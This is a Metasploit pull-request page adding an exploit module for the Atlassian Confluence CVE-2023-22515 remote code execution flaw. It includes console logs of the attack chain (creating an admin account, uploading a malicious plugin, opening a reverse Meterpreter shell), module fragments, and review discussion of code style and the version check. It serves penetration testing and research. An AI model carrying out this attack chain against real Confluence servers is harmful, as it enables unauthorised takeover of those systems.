
CVE-2023-22515 - Atlassian Confluence unauthenticated RCE exploit module #18461

Merged
merged 15 commits into from
Oct 19, 2023

Conversation

sfewer-r7
Contributor

This module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP
parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for
Java objects to be modified at run time. The exploit will create a new administrator user and upload a
malicious plugin to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2,
8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.

For a full technical analysis of the vulnerability read the Rapid7 AttackerKB Analysis.

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Atlassian Confluence 8.5.1
[*] Setting the application configuration's setupComplete to false via endpoint: /server-info.action
[*] Creating a new administrator user account...
[*] Created zskghlfv:NDqbcj4N
[*] Adding a malicious plugin...
[*] Waiting for plugin to be installed...
[*] Triggering payload...
[*] Deleting plugin...
[*] Sending stage (57692 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:56898) at 2023-10-16 20:41:57 +0100

meterpreter > getuid
Server username: WIN-V28QNSO2H05$
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 10.0 (amd64)
Architecture    : x64
System Language : en_IE
Meterpreter     : java/windows
meterpreter > pwd
C:\Program Files\Atlassian\Confluence
meterpreter > 

Contributor

@jvoisin jvoisin left a comment


There was already a pull-request for this exploit: #18447 :/

# Confluence may have a non default base path, allow user to configure that here.
OptString.new('TARGETURI', [true, 'Base path for Confluence', '/']),
# The endpoint we target to trigger the vulnerability.
OptString.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', 'server-info.action']),
Contributor


Are there other possible endpoints?

Contributor Author


Yes, due to the nature of the vuln there are likely numerous endpoints that can be targeted, for example:

msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > set CONFLUENCE_TARGET_ENDPOINT /ajax/spaceavailable.action
CONFLUENCE_TARGET_ENDPOINT => /ajax/spaceavailable.action
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Setting the application configuration's setupComplete to false via endpoint: /ajax/spaceavailable.action
[*] Creating a new administrator user account...
[*] Created fuhghwol:I2WHP3At
[*] Adding a malicious plugin...
[*] Waiting for plugin to be installed...
[*] Triggering payload...
[*] Deleting plugin...
[*] Sending stage (57692 bytes) to 192.168.86.50
[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.50:62207) at 2023-10-17 09:12:53 +0100

meterpreter > getuid
Server username: WIN-V28QNSO2H05$
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.86.50 - Meterpreter session 4 closed.  Reason: User exit
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > 

Contributor


It might be nice/interesting to provide a small list of possible ones I think, to make fingerprinting harder.

Contributor Author


I added some extra documentation via c63aaba which mentions the other endpoint shown above.

# 4. Upload a new Confluence Servlet plugin, by first requesting a UPM token.
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') << '/',
Contributor


Suggested change
'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') << '/',
'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/',
  • +: Returns the concatenation of self and a given other string.
  • <<: Returns self concatenated with a given string or integer.

so I guess it's a matter of taste, but I think™ that people are more used to + for string concatenation than <<, especially given that the latter is usually used to append a single element to an array.

Contributor Author

@sfewer-r7 sfewer-r7 Oct 17, 2023


My understanding is that in Ruby the << operator is faster, and so is generally the preferred operator to concat two strings. Happy to change this if using + is the best practice.

Contributor

@adfoster-r7 adfoster-r7 Oct 17, 2023


<< is faster, but also the source of multiple bugs in framework 😄

It also stops us from enabling frozen strings globally, which could help reduce object allocations https://www.mikeperham.com/2018/02/28/ruby-optimization-with-one-magic-comment/

Contributor Author


Thanks Alan, sounds like + should be the preferred operator, so I have done this via 34107e4.

Contributor


This comes up every few years, under various guises; and while I'm all for reducing allocations... + actually creates them (or did, anyway - a bit behind on my RubyVM-fu). Using << appends the contents of the right buffer to that on the left (eventually meaning "scatter-gather addition of existing SG buffer" under Linux anyway) whereas + creates a new buffer copying both sides into it and then hopefully deallocating the sources. Up here in Msf it might not be as noticeable, but down in Rex it can get pretty bad if you have a lot of IO and under memory pressure against various forms of GC. Back in the RBX days when VM instrumentation was "cool," we actually saw this effect pretty clearly during my machinations with rex-guts-n-stuff.

Contributor


Would it be worth adding a rubocop/msftidy rule to catch this?

Contributor Author


Would it be worth adding a rubocop/msftidy rule to catch this?

Sounds like a great idea to me
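The review thread above argues about String#<< versus String#+ from memory (allocation count) and from correctness (the "multiple bugs in framework" remark, and the frozen-string-literal point). The following is an added example, not code from this PR or from the Metasploit module, that makes both sides of the argument observable: whether each operator hands back the receiver object, what happens when the receiver is a string shared between calls (a default option value or a constant), and what happens once that string is frozen, which is exactly the state `# frozen_string_literal: true` would put every literal in. The path string is a constructed sample.

```ruby
# Added example, not code from the PR or the Metasploit module: contrasts
# String#<< and String#+ as discussed in the review thread.
#
# String#<< appends to the receiver in place and returns that same object;
# String#+ allocates a new String and leaves both operands untouched.
def append_segment(base, operator)
  case operator
  when :shovel then base << '/'
  when :plus   then base + '/'
  else raise ArgumentError, "unknown operator #{operator.inspect}"
  end
end

# Does the operator hand back the very object it was given?
# String.new always yields an unfrozen string, whatever the file's literal
# settings are, so the result is deterministic.
def mutates_receiver?(operator)
  base = String.new('/rest/plugins/1.0') # constructed sample path
  append_segment(base, operator).equal?(base)
end

# The bug class the reviewers allude to: a string shared between calls
# (a default option value, a constant) silently drifts when built with <<.
# Returns [first result, second result, shared value afterwards].
def shared_default_drift(operator)
  shared = String.new('/rest/plugins/1.0') # constructed sample path
  first  = append_segment(shared, operator)
  second = append_segment(shared, operator)
  [first, second, shared]
end

# What `# frozen_string_literal: true` would do to every literal in a file:
# << raises FrozenError, + keeps working because it never touches its operands.
def append_to_frozen(operator)
  frozen = '/rest/plugins/1.0'.freeze # constructed sample path
  append_segment(frozen, operator)
rescue FrozenError
  :frozen_error
end

if __FILE__ == $PROGRAM_NAME
  %i[shovel plus].each do |op|
    puts "#{op}: mutates receiver=#{mutates_receiver?(op)} " \
         "drift=#{shared_default_drift(op).inspect} " \
         "frozen=#{append_to_frozen(op).inspect}"
  end
end
```

With `:shovel`, all three elements returned by `shared_default_drift` are the same object and end up as `/rest/plugins/1.0//`, which is the kind of doubled-separator defect that only appears on the second use of a shared default; with `:plus` the shared value is untouched. The frozen case shows why `<<` blocks enabling frozen string literals globally, as the thread notes.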

Comment on lines +302 to +303
# 9. Delete the plugin we uploaded as we no longer need it. We cannot delete the admin user we created as
# Confluence doesn't allow a user to delete themselves.
Contributor


Would it be possible for the plugin to delete the admin?

Contributor


I haven't looked into this option too much, but it looks like there is no command line to interact with Confluence directly. The only way would be to delete the user directly from the database and there is a high probability this would result in a corrupted database and break everything.

@sfewer-r7
Contributor Author

sfewer-r7 commented Oct 17, 2023

There was already a pull-request for this exploit: #18447 :/

Hi @jvoisin , #18447 is for an auxiliary module (not an exploit) to create a new admin account, whilst this pull request is for an exploit module to run a payload; both leverage the same vuln for different purposes. I don't see a problem having different module types covering the same CVE. Another example of this in the framework is the Adobe ColdFusion vuln CVE-2023-26360, whereby we have an auxiliary module and an exploit module for the same CVE.

@cdelafuente-r7 cdelafuente-r7 self-assigned this Oct 17, 2023
@sempervictus
Contributor

@sfewer-r7 - thanks. Must feel good to finally give some pain back to that accursed thing 😉

Far as the aux and exploit module... this is why we have application and protocol specific mixins IMO. When two modules start doing similar things, that's usually when it's time to review their commonalities and extract them to a mixin which also formalizes the datastore options for that context (see AWS module mess for why that's good).

Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment


Thanks @sfewer-r7 for this great module and the related research! I just left a few suggestions, but otherwise, it looks good to me. I tested against version 8.5.1 installed on Windows 11 and it works great.

@cdelafuente-r7
Contributor

Thanks @sfewer-r7 ! Everything looks good to me now. I tested against version 8.5.1 installed on Windows 11 and verified I got a session. I'll go ahead and land it.

Example output:
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2023_22515) > run verbose=true lhost=192.168.100.1 rhosts=192.168.100.33

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Atlassian Confluence 8.5.1
[*] Setting the application configuration's setupComplete to false via endpoint: /server-info.action
[*] Creating a new administrator user account...
[*] Created dsrrlgaf:x4nq1Ill
[*] Adding a malicious plugin...
[*] Waiting for plugin to be installed...
[*] Sleeping for 2 seconds before attempting again
[*] Sleeping for 4 seconds before attempting again
[*] Triggering payload...
[*] Sending stage (57692 bytes) to 192.168.100.33
[*] Deleting plugin...
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.33:53043) at 2023-10-19 10:09:34 +0200

meterpreter > getuid
Server username: DESKTOP-26CQRHP$
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 11 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows

@cdelafuente-r7 cdelafuente-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Oct 19, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit da9d04d into rapid7:master Oct 19, 2023
35 checks passed
@sfewer-r7
Contributor Author

Thank you @cdelafuente-r7 and @jvoisin for the review, and thanks @adfoster-r7 and @sempervictus for the insights into string concatenation :)

@cdelafuente-r7
Contributor

Release Notes

This adds an exploit module that leverages an improper input validation issue in Atlassian Confluence versions between 8.0.0 through to 8.3.2, 8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1. This vulnerability is identified as CVE-2023-22515 and allows unauthenticated remote code execution. The module first creates a new administrator by abusing the embedded XWorks2 middleware and uploading a malicious plugin to get code execution. Note that the module is currently not able to delete the new administrator account it created. This would require a manual clean up.


# If we have a Confluence server within the given version ranges, it appears vulnerable.
ranges.each do |min, max|
if version.between?(Rex::Version.new(min), Rex::Version.new(max))

@grantwillcoxh3ai grantwillcoxh3ai Oct 19, 2023


@stephenfewer Won't this specifically exclude the edge cases such as 8.0.0 and 8.3.2 which are also technically vulnerable? Same for 8.4.0 and 8.4.2, and 8.5.0 and 8.5.1.

Contributor Author


Hi @grantwillcoxh3ai, in my testing between? will include the min and max version as part of the range check, so the check routine should work as expected. I was testing against 8.5.1 (one of the edge cases you mention) and the check was successful.
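The exchange above hinges on whether `between?` includes its end points, which matters for a version check because the advisory's boundary releases (8.0.0, 8.3.2, 8.4.0, 8.4.2, 8.5.0, 8.5.1) are themselves affected. The following added example is not the module's own check routine; it reimplements the same range test over the version ranges stated in the PR description and exercises each boundary together with its nearest unaffected neighbour. It uses the standard library's `Gem::Version` as a stand-in for `Rex::Version` (an assumption; both are `Comparable`, so `between?` behaves the same way), and the version strings fed to `edge_case_report` are constructed sample inputs.

```ruby
require 'rubygems' # Gem::Version; loaded by default in modern Ruby, explicit here

# Added example, not the Metasploit module's code. Ranges are taken from the
# PR description; Gem::Version stands in for Rex::Version (assumption).
AFFECTED_RANGES = [
  ['8.0.0', '8.3.2'],
  ['8.4.0', '8.4.2'],
  ['8.5.0', '8.5.1']
].freeze

# True when the reported version lies inside one of the affected ranges.
# Comparable#between?(min, max) is inclusive at both ends, which is why the
# boundary releases are matched without a special case.
def affected_version?(version_string, ranges = AFFECTED_RANGES)
  version = Gem::Version.new(version_string)
  ranges.any? do |min, max|
    version.between?(Gem::Version.new(min), Gem::Version.new(max))
  end
end

# Defender-side variant: return the matching [min, max] pair (or nil) so an
# asset inventory can record which advisory range a host falls into.
def matching_range(version_string, ranges = AFFECTED_RANGES)
  version = Gem::Version.new(version_string)
  ranges.find do |min, max|
    version.between?(Gem::Version.new(min), Gem::Version.new(max))
  end
end

# Every boundary release from the advisory plus its nearest neighbour just
# outside the range. Constructed sample inputs; returns [version, affected?].
def edge_case_report
  %w[7.19.0 8.0.0 8.3.2 8.3.3 8.4.0 8.4.2 8.4.3 8.5.0 8.5.1 8.5.2].map do |v|
    [v, affected_version?(v)]
  end
end

if __FILE__ == $PROGRAM_NAME
  edge_case_report.each do |v, hit|
    puts format('%-8s %s', v, hit ? 'affected' : 'not affected')
  end
end
```

`Gem::Version` compares component-wise rather than lexically, so 8.5.10 would correctly sort above 8.5.2; a plain string comparison would not, which is the other classic defect in hand-rolled version checks.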

@sfewer-r7 sfewer-r7 deleted the CVE-2023-22515 branch July 4, 2024 08:59